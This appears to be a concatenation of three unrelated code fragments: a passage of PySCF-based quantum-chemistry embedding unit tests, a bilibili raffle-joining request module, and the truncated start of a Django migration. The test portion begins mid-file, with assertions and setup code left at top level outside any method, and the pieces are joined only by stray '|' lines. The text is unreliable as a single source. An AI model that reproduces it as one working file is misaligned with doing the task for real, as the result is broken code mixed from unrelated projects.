#mol.atom = '''
#C 1.3026 9.2236 -0.0001
#F 2.3785 10.1081 0.0001
#H 1.3873 8.5867 -0.8899
#H 1.3873 8.5862 0.8894
#ghost:C -0.0002 9.9997 0.0001
#ghost:H -0.8544 9.3128 -0.0001
#ghost:H -0.0683 10.6366 0.8880
#ghost:H -0.0683 10.6370 -0.8875
#'''
#mol.basis = 'cc-pVDZ'
#mol.spin = 1
#mol.build()
#env_method = 'hf'
#active_method = 'ccsd'
#subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method, unrestricted=True, hl_unrestricted=True)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
ghost:C 1.3026 9.2236 -0.0001
ghost:F 2.3785 10.1081 0.0001
ghost:H 1.3873 8.5867 -0.8899
ghost:H 1.3873 8.5862 0.8894
C -0.0002 9.9997 0.0001
H -0.8544 9.3128 -0.0001
H -0.0683 10.6366 0.8880
H -0.0683 10.6370 -0.8875
'''
mol2.basis = 'cc-pVDZ'
mol2.spin = -1
mol2.build()
env_method = 'hf'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method, unrestricted=True)
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'hf', fs_scf_obj, unrestricted=True, diis_num=1, max_cycle=100)
supersystem.init_density()
supersystem.freeze_and_thaw()
projector_energy = subsys.get_env_proj_e()
projector_energy += subsys2.get_env_proj_e()
self.assertAlmostEqual(0.0, projector_energy, delta=1e-12)
#test_dmat = supersystem.get_emb_dmat()
#true_dmat = supersystem.fs_scf.make_rdm1()
#test_e = supersystem.get_supersystem_energy()
#sup_e = supersystem.get_env_in_env_energy()
#self.assertAlmostEqual(test_e, sup_e, delta=1e-10)
###Long distance test.
#mol = gto.Mole()
#mol.verbose = 3
#mol.atom = '''
#O 0. 0. 0.
#O 1.13 0. 0.
#'''
#mol.basis = '3-21g'
#mol.spin = 2
#mol.build()
#nv_method = 'm06'
#active_method = 'ccsd'
#subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method, unrestricted=True, hl_unrestricted=True)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
O 0. 100.0 0.0
O 1.13 100.0 0.0
'''
mol2.basis = '3-21g'
mol2.spin = 2
mol2.build()
env_method = 'm06'
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'm06', fs_scf_obj, init_guess='supmol')
supersystem.init_density()
supersystem.freeze_and_thaw()
#projector_energy = np.trace(np.dot(subsys.get_dmat()[0], supersystem.proj_pot[0][0]))
#projector_energy += np.trace(np.dot(subsys.get_dmat()[1], supersystem.proj_pot[0][1]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[0], supersystem.proj_pot[1][0]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[1], supersystem.proj_pot[1][1]))
#self.assertAlmostEqual(0.0, projector_energy, delta=1e-14)
#mol3 = gto.Mole()
#mol3.verbose = 3
#mol3.atom ='''
#O 0. 0. 0.
#O 1.13 0. 0.
#O 0. 100.0 0.0
#O 1.13 100.0 0.0
#'''
#mol3.basis = '3-21g'
#mol3.spin = 4
#mol3.build()
#mf = dft.UKS(mol3)
#mf.xc = 'm06'
#mf.grids = supersystem.fs_scf.grids
#mf.max_cycle = 1000
#mf.kernel()
#test_dmat = mf.make_rdm1()
#test_e = mf.energy_tot()
#sup_e = supersystem.get_env_in_env_energy()
#self.assertAlmostEqual(test_e, sup_e, delta=1e-10)
##Projection energy
#mol = gto.Mole()
#mol.verbose = 3
#mol.atom = '''
#Li 0. 0. 0.
#'''
#mol.basis = 'cc-pVDZ'
#mol.spin = 1
#mol.build()
#env_method = 'm06'
#active_method = 'ccsd'
#subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method, unrestricted=True, hl_unrestricted=True)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
H 1.595 0.0 0.0
'''
mol2.basis = 'cc-pVDZ'
mol2.spin = -1
mol2.build()
env_method = 'm06'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method, unrestricted=True)
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'm06', fs_scf_obj, unrestricted=True, init_guess='supmol')
supersystem.init_density()
#initial_projector_energy = 0.0
#initial_projector_energy = np.trace(np.dot(subsys.get_dmat()[0], supersystem.proj_pot[0][0]))
#initial_projector_energy += np.trace(np.dot(subsys.get_dmat()[1], supersystem.proj_pot[0][1]))
#initial_projector_energy += np.trace(np.dot(subsys2.get_dmat()[0], supersystem.proj_pot[1][0]))
#initial_projector_energy += np.trace(np.dot(subsys2.get_dmat()[1], supersystem.proj_pot[1][1]))
#supersystem.freeze_and_thaw()
#projector_energy = np.trace(np.dot(subsys.get_dmat()[0], supersystem.proj_pot[0][0]))
#projector_energy += np.trace(np.dot(subsys.get_dmat()[1], supersystem.proj_pot[0][1]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[0], supersystem.proj_pot[1][0]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[1], supersystem.proj_pot[1][1]))
#self.assertGreaterEqual(0.0, projector_energy-initial_projector_energy)
##Localized Spin
#mol = gto.Mole()
#mol.verbose = 3
#mol.atom = '''
# ghost.C -2.95182400 -0.40708300 0.00000200
# ghost.H -2.94830500 -1.05409800 -0.87975500
# ghost.H -2.94830300 -1.05410200 0.87975600
# ghost.H -3.88904200 0.14923700 0.00000400
# C 0.74345800 0.66525400 0.00000100
# H 0.75917800 1.30099000 -0.88423600
# H 0.75918100 1.30098600 0.88424000
# C -0.44163200 -0.26055200 0.00000000
# H -0.39317700 -0.91474400 -0.87593000
# H -0.39317500 -0.91474700 0.87592800
# C -1.74853900 0.51173600 0.00000300
# H -1.78059900 1.17041100 0.87438300
# H -1.78060000 1.17041500 -0.87437400'''
#mol.basis = 'cc-pVDZ'
#mol.spin = 1
#mol.charge = -1
#mol.build()
#env_method = 'm06'
#active_method = 'ccsd'
#subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method, unrestricted=True, hl_unrestricted=True)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
C -2.95182400 -0.40708300 0.00000200
H -2.94830500 -1.05409800 -0.87975500
H -2.94830300 -1.05410200 0.87975600
H -3.88904200 0.14923700 0.00000400
ghost.C 0.74345800 0.66525400 0.00000100
ghost.H 0.75917800 1.30099000 -0.88423600
ghost.H 0.75918100 1.30098600 0.88424000
ghost.C -0.44163200 -0.26055200 0.00000000
ghost.H -0.39317700 -0.91474400 -0.87593000
ghost.H -0.39317500 -0.91474700 0.87592800
ghost.C -1.74853900 0.51173600 0.00000300
ghost.H -1.78059900 1.17041100 0.87438300
ghost.H -1.78060000 1.17041500 -0.87437400'''
mol2.basis = 'cc-pVDZ'
mol2.charge = 1
mol2.build()
env_method = 'm06'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method, unrestricted=True)
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'm06', fs_scf_obj, diis_num=1, unrestricted=True)
supersystem.init_density()
supersystem.freeze_and_thaw()
projector_energy = np.trace(np.dot(subsys.get_dmat()[0], supersystem.proj_pot[0][0]))
projector_energy += np.trace(np.dot(subsys.get_dmat()[1], supersystem.proj_pot[0][1]))
projector_energy += np.trace(np.dot(subsys2.get_dmat()[0], supersystem.proj_pot[1][0]))
projector_energy += np.trace(np.dot(subsys2.get_dmat()[1], supersystem.proj_pot[1][1]))
#self.assertAlmostEqual(0.0, projector_energy, delta=1e-15)
mol3 = gto.Mole()
mol3.atom ='''
C 0.74345800 0.66525400 0.00000100
H 0.75917800 1.30099000 -0.88423600
H 0.75918100 1.30098600 0.88424000
C -0.44163200 -0.26055200 0.00000000
H -0.39317700 -0.91474400 -0.87593000
H -0.39317500 -0.91474700 0.87592800
C -1.74853900 0.51173600 0.00000300
H -1.78059900 1.17041100 0.87438300
H -1.78060000 1.17041500 -0.87437400
C -2.95182400 -0.40708300 0.00000200
H -2.94830500 -1.05409800 -0.87975500
H -2.94830300 -1.05410200 0.87975600
H -3.88904200 0.14923700 0.00000400
'''
mol3.basis = 'cc-pVDZ'
mol3.spin = 1
mol3.build()
mf = dft.UKS(mol3)
mf.xc = 'm06'
grids = supersystem.fs_scf.grids
mf.grids = grids
mf.kernel()
test_e = mf.energy_tot()
sup_e = supersystem.get_env_in_env_energy()
#self.assertAlmostEqual(test_e, sup_e, delta=1e-10)
# Restricted Open Shell
#Localized Spin
mol = gto.Mole()
mol.verbose = 3
mol.atom = '''
C 0.74345800 0.66525400 0.00000100
H 0.75917800 1.30099000 -0.88423600
H 0.75918100 1.30098600 0.88424000
ghost.C -0.44163200 -0.26055200 0.00000000
ghost.H -0.39317700 -0.91474400 -0.87593000
ghost.H -0.39317500 -0.91474700 0.87592800
ghost.C -1.74853900 0.51173600 0.00000300
ghost.H -1.78059900 1.17041100 0.87438300
ghost.H -1.78060000 1.17041500 -0.87437400
ghost.H -2.95182400 -0.40708300 0.00000200'''
mol.basis = '6-31g'
mol.spin = 1
mol.charge = -1
mol.build()
env_method = 'm06'
active_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method, hl_unrestricted=True)
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
ghost.C 0.74345800 0.66525400 0.00000100
ghost.H 0.75917800 1.30099000 -0.88423600
ghost.H 0.75918100 1.30098600 0.88424000
C -0.44163200 -0.26055200 0.00000000
H -0.39317700 -0.91474400 -0.87593000
H -0.39317500 -0.91474700 0.87592800
C -1.74853900 0.51173600 0.00000300
H -1.78059900 1.17041100 0.87438300
H -1.78060000 1.17041500 -0.87437400
H -2.95182400 -0.40708300 0.00000200'''
mol2.basis = '6-31g'
mol2.charge = 1
mol2.build()
env_method = 'm06'
subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
mol12 = helpers.concat_mols([mol, mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'm06', fs_scf_obj, max_cycle=200, diis_num=1, damp=0.4)
supersystem.init_density()
supersystem.freeze_and_thaw()
projector_energy = subsys.get_env_proj_e()
projector_energy += subsys2.get_env_proj_e()
self.assertAlmostEqual(0.0, projector_energy, delta=1e-15)
mol3 = gto.Mole()
mol3.atom ='''
C 0.74345800 0.66525400 0.00000100
H 0.75917800 1.30099000 -0.88423600
H 0.75918100 1.30098600 0.88424000
C -0.44163200 -0.26055200 0.00000000
H -0.39317700 -0.91474400 -0.87593000
H -0.39317500 -0.91474700 0.87592800
C -1.74853900 0.51173600 0.00000300
H -1.78059900 1.17041100 0.87438300
H -1.78060000 1.17041500 -0.87437400
H -2.95182400 -0.40708300 0.00000200
'''
mol3.basis = '6-31g'
mol3.spin = 1
mol3.build()
mf = dft.ROKS(mol3)
mf.xc = 'm06'
grids = supersystem.fs_scf.grids
mf.grids = grids
mf.kernel()
test_e = mf.energy_tot()
sup_e = supersystem.get_env_in_env_energy()
self.assertAlmostEqual(test_e, sup_e, delta=1e-7)
#Supermolecular test.
#mol = gto.Mole()
#mol.verbose = 3
#mol.atom = '''
#H 1.1851 -0.0039 0.9875
#C 0.7516 -0.0225 -0.0209
#H 1.1669 0.8330 -0.5693
#H 1.1155 -0.9329 -0.5145
#ghost:C -0.7516 0.0225 0.0209
#ghost:H -1.1669 -0.8334 0.5687
#ghost:H -1.1157 0.9326 0.5151
#ghost:H -1.1850 0.0044 -0.9875
#'''
#mol.basis = 'cc-pVDZ'
#mol.spin = 1
#mol.build()
#env_method = 'rohf'
#active_method = 'ccsd'
#subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method)
#mol2 = gto.Mole()
#mol2.verbose = 3
#mol2.atom = '''
#C -0.7516 0.0225 0.0209
#H -1.1669 -0.8334 0.5687
#H -1.1157 0.9326 0.5151
#H -1.1850 0.0044 -0.9875
#ghost:H 1.1851 -0.0039 0.9875
#ghost:C 0.7516 -0.0225 -0.0209
#ghost:H 1.1669 0.8330 -0.5693
#ghost:H 1.1155 -0.9329 -0.5145
#'''
#mol2.basis = 'cc-pVDZ'
#mol2.spin = -1
#mol2.build()
#env_method = 'rohf'
#subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
#supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'hf', ft_conv=1e-10)
#supersystem.init_density()
#supersystem.freeze_and_thaw()
#projector_energy = np.trace(np.dot(subsys.get_dmat()[0], supersystem.proj_pot[0][0]))
#projector_energy += np.trace(np.dot(subsys.get_dmat()[1], supersystem.proj_pot[0][1]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[0], supersystem.proj_pot[1][0]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[1], supersystem.proj_pot[1][1]))
#self.assertAlmostEqual(0.0, projector_energy, delta=1e-13)
#mol3 = gto.Mole()
#mol3.atom ='''
#H 1.1851 -0.0039 0.9875
#C 0.7516 -0.0225 -0.0209
#H 1.1669 0.8330 -0.5693
#H 1.1155 -0.9329 -0.5145
#C -0.7516 0.0225 0.0209
#H -1.1669 -0.8334 0.5687
#H -1.1157 0.9326 0.5151
#H -1.1850 0.0044 -0.9875
#'''
#mol3.basis = 'cc-pVDZ'
#mol3.build()
#mf = scf.RHF(mol3)
##mf.xc = 'm06'
##grids = supersystem.fs_scf.grids
##mf.grids = grids
#mf.kernel()
#test_e = mf.energy_tot()
#sup_e = supersystem.get_env_in_env_energy()
#self.assertAlmostEqual(test_e, sup_e, delta=1e-10)
#mol = gto.Mole()
#mol.verbose = 3
#mol.atom = '''
#H 1.1851 -0.0039 0.9875
#C 0.7516 -0.0225 -0.0209
#H 1.1669 0.8330 -0.5693
#H 1.1155 -0.9329 -0.5145
#ghost:C -0.7516 0.0225 0.0209
#ghost:H -1.1669 -0.8334 0.5687
#ghost:H -1.1157 0.9326 0.5151
#ghost:H -1.1850 0.0044 -0.9875
#'''
#mol.basis = '3-21g'
#mol.spin = 1
##mol.charge = -1
#mol.build()
#env_method = 'hf'
#active_method = 'ccsd'
#subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method, initguess='minao')
#mol2 = gto.Mole()
#mol2.verbose = 3
#mol2.atom = '''
#C -0.7516 0.0225 0.0209
#H -1.1669 -0.8334 0.5687
#H -1.1157 0.9326 0.5151
#H -1.1850 0.0044 -0.9875
#ghost:H 1.1851 -0.0039 0.9875
#ghost:C 0.7516 -0.0225 -0.0209
#ghost:H 1.1669 0.8330 -0.5693
#ghost:H 1.1155 -0.9329 -0.5145
#'''
#mol2.basis = '3-21g'
#mol2.spin = -1
##mol2.charge = 1
#mol2.build()
#env_method = 'hf'
#subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method, initguess='minao')
#supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'hf', ft_cycles=100)
#supersystem.init_density()
#supersystem.freeze_and_thaw()
#projector_energy = np.trace(np.dot(subsys.get_dmat()[0], supersystem.proj_pot[0][0]))
#projector_energy += np.trace(np.dot(subsys.get_dmat()[1], supersystem.proj_pot[0][1]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[0], supersystem.proj_pot[1][0]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[1], supersystem.proj_pot[1][1]))
#self.assertAlmostEqual(0.0, projector_energy, delta=1e-13)
#mol3 = gto.Mole()
#mol3.atom ='''
#H 1.1851 -0.0039 0.9875
#C 0.7516 -0.0225 -0.0209
#H 1.1669 0.8330 -0.5693
#H 1.1155 -0.9329 -0.5145
#C -0.7516 0.0225 0.0209
#H -1.1669 -0.8334 0.5687
#H -1.1157 0.9326 0.5151
#H -1.1850 0.0044 -0.9875
#'''
#mol3.basis = '3-21g'
#mol3.build()
#mf = scf.ROHF(mol3)
##mf.xc = 'm06'
##grids = supersystem.fs_scf.grids
##mf.grids = grids
#mf.kernel()
#test_e = mf.energy_tot()
#sup_e = supersystem.get_env_in_env_energy()
#self.assertAlmostEqual(test_e, sup_e, delta=1e-10)
##Long distance test.
#mol = gto.Mole()
#mol.verbose = 3
#mol.atom = '''
#O 0. 0. 0.
#O 1.13 0. 0.
#'''
#mol.basis = 'cc-pVDZ'
#mol.spin = 2
#mol.build()
#env_method = 'rohf'
#active_method = 'ccsd'
#subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method)
#mol2 = gto.Mole()
#mol2.verbose = 3
#mol2.atom = '''
#O 0. 100.0 0.0
#O 1.13 100.0 0.0
#'''
#mol2.basis = 'cc-pVDZ'
#mol2.spin = -2
#mol2.build()
#env_method = 'rohf'
#subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
#supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'hf', ft_initguess='supmol')
#supersystem.init_density()
#supersystem.freeze_and_thaw()
#projector_energy = np.trace(np.dot(subsys.get_dmat()[0], supersystem.proj_pot[0][0]))
#projector_energy += np.trace(np.dot(subsys.get_dmat()[1], supersystem.proj_pot[0][1]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[0], supersystem.proj_pot[1][0]))
#projector_energy += np.trace(np.dot(subsys2.get_dmat()[1], supersystem.proj_pot[1][1]))
#self.assertAlmostEqual(0.0, projector_energy, delta=1e-14)
#self.assertTrue(False)
#mol3 = gto.Mole()
#mol3.verbose = 3
#mol3.atom ='''
#Li 0. 0. 0.
#Li 12.22 0.0 0.0
#'''
#mol3.basis = '3-21g'
#mol3.build()
#mf = dft.UKS(mol3)
#mf.xc = 'm06'
#grids = dft.gen_grid.Grids(mol3)
#grids.level = supersystem.grid_level
#grids.build()
#mf.grids = grids
#mf.kernel()
#test_dmat = mf.make_rdm1()
#test_e = mf.energy_tot()
#sup_e = supersystem.env_in_env_energy()
#self.assertTrue(np.allclose(test_dmat, (supersystem.dmat[0] + supersystem.dmat[1]), atol=1e-6))
#self.assertAlmostEqual(test_e, sup_e, delta=1e-10)
#Projection energy
#mol = gto.Mole()
#mol.verbose = 3
#mol.atom = '''
#Li 0. 0. 0.
#'''
#mol.basis = '3-21g'
#mol.spin = 1
#mol.build()
#env_method = 'm06'
#active_method = 'ccsd'
#subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, active_method)
#mol2 = gto.Mole()
#mol2.verbose = 3
#mol2.atom = '''
#Li 1.595 0.0 0.0
#'''
#mol2.basis = '3-21g'
#mol2.spin = -1
#mol2.build()
#env_method = 'm06'
#subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
#supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'm06', ft_initguess='supmol', fs_unrestricted=True, ft_cycles=10)
#initial_projector_energy = 0.0
#initial_projector_energy = np.trace(np.dot(subsys.dmat[0], supersystem.proj_pot[0][0]))
#initial_projector_energy += np.trace(np.dot(subsys.dmat[1], supersystem.proj_pot[0][1]))
#initial_projector_energy += np.trace(np.dot(subsys2.dmat[0], supersystem.proj_pot[1][0]))
#initial_projector_energy += np.trace(np.dot(subsys2.dmat[1], supersystem.proj_pot[1][1]))
#supersystem.freeze_and_thaw()
#projector_energy = np.trace(np.dot(subsys.dmat[0], supersystem.proj_pot[0][0]))
#projector_energy += np.trace(np.dot(subsys.dmat[1], supersystem.proj_pot[0][1]))
#projector_energy += np.trace(np.dot(subsys2.dmat[0], supersystem.proj_pot[1][0]))
#projector_energy += np.trace(np.dot(subsys2.dmat[1], supersystem.proj_pot[1][1]))
#self.assertGreaterEqual(0.0, projector_energy-initial_projector_energy)
@unittest.skip
def test_get_supersystem_nuc_grad(self):
    """Compare the embedded supersystem nuclear gradient against a plain
    RKS/B3LYP calculation on the combined H2 + O geometry.

    Skipped: the final gradient comparison is still commented out below.
    """
    #Closed Shell
    # scratch file shared by the subsystem and supersystem objects
    t_file = tempfile.NamedTemporaryFile()
    mol = gto.Mole()
    #mol.verbose = 4
    mol.atom = '''
H 0.758602 0.000000 0.504284
H 0.758602 0.000000 -0.504284
'''
    mol.basis = '3-21g'
    mol.build()
    env_method = 'b3lyp'
    hl_method = 'ccsd'
    # high-level (CCSD-in-DFT) subsystem: the two hydrogens
    subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, hl_method, filename=t_file.name)
    mol2 = gto.Mole()
    #mol2.verbose = 4
    mol2.atom = '''
O 0.0 0.0 0.0'''
    mol2.basis = '3-21g'
    mol2.build()
    env_method = 'b3lyp'
    # environment subsystem: the oxygen atom
    subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method, filename=t_file.name)
    supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'b3lyp', ft_initguess='minao', filename=t_file.name)
    supsystem_e = supersystem.get_supersystem_energy()
    supsystem_grad = supersystem.get_supersystem_nuc_grad()
    # Reference: conventional RKS/B3LYP on the full geometry using the same
    # convergence threshold and integration grid as the supersystem.
    mol3 = gto.Mole()
    #mol3.verbose = 4
    mol3.atom = '''
H 0.758602 0.000000 0.504284
H 0.758602 0.000000 -0.504284
O 0.0 0.0 0.0
'''
    mol3.basis = '3-21g'
    mol3.build()
    test_scf = dft.RKS(mol3)
    test_scf.xc = 'b3lyp'
    test_scf.conv_tol = supersystem.fs_conv
    grids = dft.gen_grid.Grids(mol3)
    grids.level = supersystem.grid_level
    grids.build()
    test_scf.grids = grids
    test_e = test_scf.kernel()
    test_grad = test_scf.nuc_grad_method()
    test_grad.kernel()
    #self.assertAlmostEqual(test_grad.grad(), supsystem_grad.grad())
@unittest.skip
def test_get_subsystem_nuc_grad(self):
    """Exercise subsystem-level nuclear gradients after freeze-and-thaw.

    Skipped: the final gradient comparison is still commented out below.
    """
    #Closed Shell
    mol = gto.Mole()
    #mol.verbose = 4
    mol.atom = '''
O 0.0 0.0 0.0
'''
    mol.basis = '3-21g'
    mol.build()
    env_method = 'b3lyp'
    hl_method = 'rhf'
    # high-level (RHF-in-DFT) subsystem: one oxygen atom
    subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, hl_method)
    mol2 = gto.Mole()
    #mol2.verbose = 4
    mol2.atom = '''
O 1.208 0.0 0.0
'''
    mol2.basis = '3-21g'
    mol2.build()
    env_method = 'b3lyp'
    # environment subsystem: the second oxygen of the O2 molecule
    subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
    supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], 'b3lyp', ft_initguess='minao', ft_cycles=50)
    supsystem_e = supersystem.get_supersystem_energy()
    supersystem.freeze_and_thaw()
    # gradients on the embedded side
    subsystem_grad = subsys.get_env_nuc_grad()
    subsys.hl_in_env_energy()
    subsys.get_hl_nuc_grad()
    supersystem_grad = supersystem.get_embedding_nuc_grad()
    # Reference RKS/B3LYP calculation.  NOTE(review): this geometry (two
    # waters 30 A apart) does not match the O2 supersystem built above —
    # confirm which reference was intended before enabling the assertion.
    mol3 = gto.Mole()
    #mol3.verbose = 4
    mol3.atom = '''
H 0.758602 0.000000 0.504284
H 0.758602 0.000000 -0.504284
O 0.0 0.0 0.0
H 0.758602 30.000000 0.504284
H 0.758602 30.000000 -0.504284
O 0.0 30.0 0.0
'''
    mol3.basis = '3-21g'
    mol3.build()
    test_scf = dft.RKS(mol3)
    test_scf.xc = 'b3lyp'
    test_scf.conv_tol = supersystem.fs_conv
    grids = dft.gen_grid.Grids(mol3)
    grids.level = supersystem.grid_level
    grids.build()
    test_scf.grids = grids
    test_e = test_scf.kernel()
    test_grad = test_scf.nuc_grad_method()
    elec_grad = test_grad.grad_elec(test_scf.mo_energy, test_scf.mo_coeff, test_scf.mo_occ)
    #print (elec_grad)
    #self.assertAlmostEqual(test_grad.grad(), supsystem_grad.grad())
@unittest.skip
def test_update_proj_pot(self):
    """Verify the supersystem's Huzinaga projection potential.

    This test is crude, but the only other way to do it would be to
    actually calculate the projection operator: it rebuilds
    P_A = -sum_B (F_AB.D_B.S_BA + (F_AB.D_B.S_BA)^T) by hand for each
    subsystem and spin channel and compares against supersystem.proj_pot.
    """
    # Closed Shell
    mol = gto.Mole()
    mol.verbose = 3
    mol.atom = '''
H 0. -2.757 2.857
H 0. 2.757 2.857
ghost:H 0. 0. 2.857
'''
    mol.basis = '3-21g'
    mol.build()
    env_method = 'm06'
    hl_method = 'ccsd'
    subsys = cluster_subsystem.ClusterHLSubSystem(mol, env_method, hl_method)
    mol2 = gto.Mole()
    mol2.verbose = 3
    mol2.atom = '''
He 1.0 2.0 0.0
He 3.0 2.0 0.0'''
    mol2.basis = '3-21g'
    mol2.build()
    env_method = 'm06'
    subsys2 = cluster_subsystem.ClusterEnvSubSystem(mol2, env_method)
    mol12 = helpers.concat_mols([mol, mol2])
    fs_scf_obj = helpers.gen_scf_obj(mol12, 'm06')
    supersystem = cluster_supersystem.ClusterSuperSystem(
        [subsys, subsys2], 'm06', fs_scf_obj, init_guess='minao')
    supersystem.init_density()
    # Recalculate the Huzinaga projector potential by hand.
    s2s = supersystem.sub2sup
    sub_pop_list = [0, 0]
    for A in range(len(supersystem.subsystems)):
        nA = supersystem.subsystems[A].mol.nao_nr()
        POp = [np.zeros((nA, nA)), np.zeros((nA, nA))]
        # cycle over all other subsystems
        for B in range(len(supersystem.subsystems)):
            if B == A:
                continue
            SBA = supersystem.smat[np.ix_(s2s[B], s2s[A])]
            FAB = [None, None]
            FAB[0] = supersystem.fock[0][np.ix_(s2s[A], s2s[B])]
            FAB[1] = supersystem.fock[1][np.ix_(s2s[A], s2s[B])]
            FDS = [None, None]
            FDS[0] = np.dot(FAB[0], np.dot(supersystem.subsystems[B].env_dmat[0], SBA))
            FDS[1] = np.dot(FAB[1], np.dot(supersystem.subsystems[B].env_dmat[1], SBA))
            POp[0] += -1. * (FDS[0] + FDS[0].transpose())
            # BUG FIX: the beta-spin projector previously reused the
            # alpha-spin FDS[0]; it must be built from FDS[1].  (The old
            # code passed only because alpha == beta for this system.)
            POp[1] += -1. * (FDS[1] + FDS[1].transpose())
        sub_pop_list[A] = POp
    self.assertTrue(np.allclose(sub_pop_list[0][0], supersystem.proj_pot[0][0]))
    self.assertTrue(np.allclose(sub_pop_list[0][1], supersystem.proj_pot[0][1]))
    self.assertTrue(np.allclose(sub_pop_list[1][0], supersystem.proj_pot[1][0]))
    self.assertTrue(np.allclose(sub_pop_list[1][1], supersystem.proj_pot[1][1]))
# Allow running this test module directly from the command line.
if __name__ == "__main__":
    unittest.main()
|
from bili_global import API_LIVE
import utils
from json_rsp_ctrl import Ctrl, In, JsonRspType
class TvRaffleHandlerReq:
    """HTTP requests for bilibili small-TV (gift) raffles."""

    @staticmethod
    async def check(user, real_roomid):
        """Query the raffles currently available in a live room."""
        url = f"{API_LIVE}/gift/v3/smalltv/check?roomid={real_roomid}"
        return await user.bililive_session.request_json('GET', url)

    @staticmethod
    async def join(user, real_roomid, TV_raffleid):
        """Join a raffle via the v3 PC endpoint (csrf-protected POST)."""
        url = f"{API_LIVE}/gift/v3/smalltv/join"
        payload = {
            "roomid": real_roomid,
            "raffleId": TV_raffleid,
            "type": "Gift",
            "csrf_token": user.dict_bili['csrf']
        }
        headers = user.dict_bili['pcheaders']
        return await user.bililive_session.request_json(
            'POST', url, data=payload, headers=headers)

    @staticmethod
    async def join_v4(user, real_roomid, raffle_id, raffle_type):
        """Join a raffle via the v4 app endpoint; the query must be signed."""
        url = f"{API_LIVE}/gift/v4/smalltv/getAward"
        temp_params = f'access_key={user.dict_bili["access_key"]}&{user.app_params}&raffleId={raffle_id}&roomid={real_roomid}&ts={utils.curr_time()}&type={raffle_type}'
        sign = user.calc_sign(temp_params)
        payload = f'{temp_params}&sign={sign}'
        return await user.bililive_session.request_json(
            'POST', url, params=payload,
            headers=user.dict_bili['appheaders'], ctrl=ReqCtrl.join_v4_ctrl)

    @staticmethod
    async def notice(user, TV_roomid, TV_raffleid):
        """Fetch the award notice for a raffle (TV_roomid is currently unused)."""
        url = f"{API_LIVE}/gift/v3/smalltv/notice?type=small_tv&raffleId={TV_raffleid}"
        return await user.bililive_session.request_json(
            'GET', url, headers=user.dict_bili['pcheaders'])
class ReqCtrl:
    # Response-handling rules for join_v4: maps (code, msg) patterns of the
    # JSON reply to a JsonRspType outcome.
    join_v4_ctrl = Ctrl(
        extend=(
            {'code': -401, 'msg': In('登陆')}, JsonRspType.LOGOUT,  # login required -> treat as logged out
            {'code': 0}, JsonRspType.OK,
            {'code': -405}, JsonRspType.OK,  # all prizes have been claimed
            {'code': -403, 'msg': In('已')}, JsonRspType.OK,  # server msg: '您已参加抽奖~' (already joined this raffle)
            {'code': -403, 'msg': In('拒绝')}, JsonRspType.OK,  # server msg: '访问被拒绝' (access denied)
            {'code': -401, 'msg': In('没开始')}, JsonRspType.OK,  # the raffle has not started yet
        )
    )
|
# Generated by Django 3.0.7 on 2020-07-06 14:21
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated (Django 3.0.7): add ``Item.summary`` and make
    ``Item.project`` a nullable FK to ``projects.Project``."""

    dependencies = [
        ('projects', '0001_initial'),
